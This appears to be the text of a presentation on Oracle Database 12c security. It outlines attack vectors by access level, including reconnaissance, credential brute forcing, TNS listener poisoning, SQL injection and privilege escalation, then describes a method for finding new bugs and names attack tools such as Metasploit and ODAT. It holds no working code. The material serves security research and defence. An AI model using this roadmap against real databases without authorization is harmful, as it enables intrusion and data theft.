  • 21. Attack vectors unauthorized authorized (limited permissions) authorized (SYSDBA) OS level
  • 22. Attack vectors • Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria): – external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access) – internal (employees with non-dba access, DBAs, OS-level users)
  • 23. Attack vectors • Attacks from unauthorized users: – reconnaissance: • looking for application servers and database tools running on the database publicly • using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly • port scanning for well known ports (such as 1521 for the TNS listener) on target machines
  • 24. Attack vectors • Attacks from unauthorized users: – gaining access: • exploring misconfiguration - using default credentials • exploring lack of identity policy – password brute forcing • exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
  • 25. Attack vectors • Attacks from unauthorized users: – data theft: • exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping) – DoS/DDoS attacks: • network level DoS (e.g. excessive packets) • buffer overflow DoS (e.g. bug in the TNS listener)
  • 26. Attack vectors • Attacks from authorized users with limited permissions: – SQL injection (typically caused by buggy applications having a DB user with excessive privileges) – DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
  • 27. Attack vectors • Attacks from authorized users with limited permissions: – privilege escalation (e.g. via the INDEX permission) – data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
  • 28. Attack vectors • SYSDBA access … the world is yours • OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
  • 30. Attack discovery approach • Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates • But how to uncover new bugs and ethically report them before being discovered by attackers ?
  • 31. Attack discovery approach • Explore new features (e.g. multitenancy) • See what parts of the security architecture of the database are in use by these features • Explore changes to the security architecture and new security features
  • 32. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – redaction policy
  • 33. Attack discovery approach • For top 12c new features (at a glance): – consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ? – redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
  • 34. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – Online Migration of Table Partition or Sub Partition
  • 35. Attack discovery approach • For top 12c new features (at a glance): – In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ? – Online Migration of Table Partition or Sub Partition – data theft ?
  • 36. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – SQL translation framework
  • 37. Attack discovery approach • For top 12c new features (at a glance): – Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ? – SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug- ins ?
  • 38. Attack discovery approach explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols) explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
  • 39. Attack discovery approach make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c analyze new PL/SQL packages for security leaks disassemble Oracle binaries
  • 40. Attack discovery approach • You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
  • 41. Tools
  • 42. Tools • nmap • Metasploit • Tnscmd • ODAT (Oracle Database Attacking Tool) • w32dasm/ IDA Freeware • Kali Linux
  • 43. Tools • ODAT supports 12.1.0.2.0: – try to find valid SIDs and credentials – try to escalate valid account to DBA or SYSDBA – try to execute OS commands from a valid account
  • 44. Some readings that may bring ideas …
  • 45. Some readings that may bring ideas …
  • 47. References Oracle 12c Security whitepaper http://www.oracle.com/technetwork/database/security/security-compliance- wp-12c-1896112.pdf Oracle Database 12c architecture overview https://www.youtube.com/watch?v=266ay9N6kAw Oracle Database 12c New security Features http://www.trivadis.com/sites/default/files/downloads/soe_oracle_da tabase_12_new_security_features_summary.pdf
  • 48. References Oracle Database 12c security http://docs.oracle.com/database/121/nav/portal_25.htm Oracle database security checklist http://www.isaca.org/groups/professional-english/oracle- database/groupdocuments/twp-security-checklist-database-1-132870.pdf Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security http://www.oracle.com/technetwork/database/options/advanced- security/advanced-security-wp-12c-1896139.pdf
  • 49. References Privelege escalation via Oracle indexes http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf Attacking Oracle with the Metasploit Framework http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates- OracleMetasploit-SLIDES.pdf Oracle Database TNS Listener Poison Attack http://www.joxeankoret.com/download/tnspoison.pdf
  • 50. References ODAT (Oracle Database Attacking Tool) tool https://github.com/quentinhardy/odat Oracle Database 12c CVE vulnerabilities statistics https://www.cvedetails.com/product/467/Oracle-Database- Server.html?vendor_id=93 Oracle Database 12c CVE vulnerabilities https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id- 467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html

Editor's Notes

  1. A motivating factor
  2. A motivating factor
  3. Using 11g make sure you do not share usernames or update to 12c.
  4. Make sure you use encrypted connection to the TNS listener even if the database us not available publicly. This could turn out to be an insider attack in case of no encryption. You can also update to 12c.
  5. Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  6. Show demo on the attack
  7. Isqlplus is not shipped with Oracle database anymore … You can also search for other “mask” URL path instead of ‘isqlplus’ You can also search for other well known web apps for database quering (that also support latest DB version) You can search for well-known messages from search applications You can also perform directory index searches Show demo on the attack
  8. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  9. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  10. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  11. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  12. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  13. David litchfield might have Bulgarian or Chinese roots as well … In the meantime the author is speaking mostly about insider attacks …
  14. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  15. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  16. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  17. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  18. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  19. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  20. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.
  21. More processes and elements are present in general in the diagram. In Oracle database 12c some of the processes are present for both CDBs and PDBs.